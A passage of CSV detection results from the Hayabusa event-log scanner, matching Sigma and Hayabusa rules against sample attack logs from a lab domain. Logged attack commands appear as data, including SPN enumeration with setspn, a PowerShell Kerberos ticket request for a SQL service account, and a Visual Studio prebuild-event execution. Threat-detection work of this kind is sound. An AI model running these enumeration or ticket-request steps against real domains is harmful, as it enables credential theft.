C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.975 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.978 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.023 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.023 +00:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.296 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.399 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.428 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.456 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.667 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.871 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.871 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.871 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.872 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.872 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:23.229 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:23.303 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:23.305 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:33.197 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,$SPNName = 'MSSQLSvc/Svc-SQL-DB01.offsec.lan',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Type): ""Add-Type"" ParameterBinding(Add-Type): name=""AssemblyName""; value=""System.IdentityModel""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-Type -AssemblyNAme System.IdentityModel,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.546 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.546 +00:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.561 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""ArgumentList""; value=""MSSQLSvc/Svc-SQL-DB01.offsec.lan"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IdentityModel.Tokens.KerberosRequestorSecurityToken"" TerminatingError(New-Object): ""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.671 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.671 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.671 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.686 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.702 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.702 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.702 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.717 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.717 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.733 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.733 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-02-01 11:13:11.195 +00:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 11:13:11.195 +00:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation_sysmon/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 15:17:15.901 +00:00,mssql01.offsec.lan,4688,low,Exec,Service Execution,,rules/sigma/process_creation_builtin/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:15.901 +00:00,mssql01.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:15.907 +00:00,mssql01.offsec.lan,4688,low,Exec,Service Execution,,rules/sigma/process_creation_builtin/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:15.907 +00:00,mssql01.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:17:16.085 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-03 15:33:16.107 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx +2021-02-08 12:03:02.776 +00:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 12:06:15.608 +00:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 12:06:53.407 +00:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-08 13:00:32.783 +00:00,WIN10-client01.offsec.lan,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-08 13:00:43.113 +00:00,WIN10-client01.offsec.lan,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-08 13:01:11.198 +00:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: 